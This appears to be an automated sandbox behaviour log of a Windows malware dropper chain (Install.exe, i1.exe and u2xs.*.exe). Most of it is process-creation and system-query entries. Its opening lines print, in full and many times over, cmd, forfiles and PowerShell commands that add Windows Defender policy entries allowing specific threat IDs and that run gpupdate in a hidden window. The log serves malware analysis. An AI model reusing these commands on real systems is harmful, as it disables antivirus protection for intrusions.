Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147735503 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147814524 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147780199 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147812831 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /c powershell start-process -windowstyle hidden gpupdate.exe /force"
Source: C:\Windows\SysWOW64\reg.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147735503 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147814524 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147780199 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147812831 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /c powershell start-process -windowstyle hidden gpupdate.exe /force"
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"225451\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"225451\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"256596\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"256596\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"242872\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"242872\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749373\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749373\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147807942\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147807942\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735735\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735735\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737010\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737010\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737007\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737007\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737503\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737503\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735503\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735503\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749376\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\"
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147735503 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147814524 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147780199 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147812831 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /c powershell start-process -windowstyle hidden gpupdate.exe /force"
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147735503 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147814524 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147780199 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147812831 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /c powershell start-process -windowstyle hidden gpupdate.exe /force"
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"225451\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"225451\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"256596\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"256596\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"242872\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"242872\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749373\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749373\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147807942\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147807942\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735735\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735735\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737010\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737010\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737007\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737007\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737503\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737503\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735503\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735503\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749376\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\"
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147735503 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147814524 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147780199 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147812831 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /c powershell start-process -windowstyle hidden gpupdate.exe /force"

Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe

Code function: 11_2_68AD3470 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,DuplicateToken,AllocateAndInitializeSid,LocalAlloc,InitializeSecurityDescriptor,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,SetSecurityDescriptorGroup,SetSecurityDescriptorOwner,IsValidSecurityDescriptor,AccessCheck,

11_2_68AD3470

Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe

11_2_68AD3470

Source: i1.exe, 00000006.00000003.2342660108.00000000070C6000.00000004.00000020.00020000.00000000.sdmp, u2xs.3.exe, 0000000F.00000000.2324296887.000000000041C000.00000020.00000001.01000000.00000011.sdmp	Binary or memory string: TrayNotifyWndShell_TrayWnd
Source: i1.exe, 00000006.00000003.2342660108.00000000070C6000.00000004.00000020.00020000.00000000.sdmp, u2xs.3.exe, 0000000F.00000000.2324296887.000000000041C000.00000020.00000001.01000000.00000011.sdmp	Binary or memory string: Shell_TrayWndtooltips_class32SVWU
Source: i1.exe, 00000006.00000003.2342660108.00000000070C6000.00000004.00000020.00020000.00000000.sdmp, u2xs.3.exe, 0000000F.00000000.2324296887.000000000041C000.00000020.00000001.01000000.00000011.sdmp	Binary or memory string: Shell_TrayWndtooltips_class32S

Source: C:\Users\user\AppData\Local\Temp\i1.exe

Code function: 6_2_00409D1B cpuid

6_2_00409D1B

Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	6_2_0042086B
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: EnumSystemLocalesW,	6_2_004170F1
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: EnumSystemLocalesW,	6_2_004201F6
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: EnumSystemLocalesW,	6_2_004201AB
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: EnumSystemLocalesW,	6_2_00420291
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	6_2_0042031E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: GetLocaleInfoW,	6_2_004174E4
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: GetLocaleInfoW,	6_2_0042056E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	6_2_00420697
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	6_2_0041FF33
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: GetLocaleInfoW,	6_2_0042079E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: EnumSystemLocalesW,	6_2_05CB04F8
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: EnumSystemLocalesW,	6_2_05CB045D
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: EnumSystemLocalesW,	6_2_05CB0412
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: GetLocaleInfoW,	6_2_05CB07D3
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: GetLocaleInfoW,	6_2_05CB07D5
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: GetLocaleInfoW,	6_2_05CA774B
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	6_2_05CB019A
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	6_2_05CB08FE
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: EnumSystemLocalesW,	6_2_05CA7358
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	6_2_05CB0AD2
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: GetLocaleInfoW,	6_2_05CB0A05
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	8_2_00414570

Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2xs.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2xs.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2xs.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2xs.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2xs.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2xs.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2xs.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2xs.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2xs.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2xs.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2xs.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2xs.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2xs.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2xs.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2xs.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2xs.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2xs.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2xs.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2xs.1.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
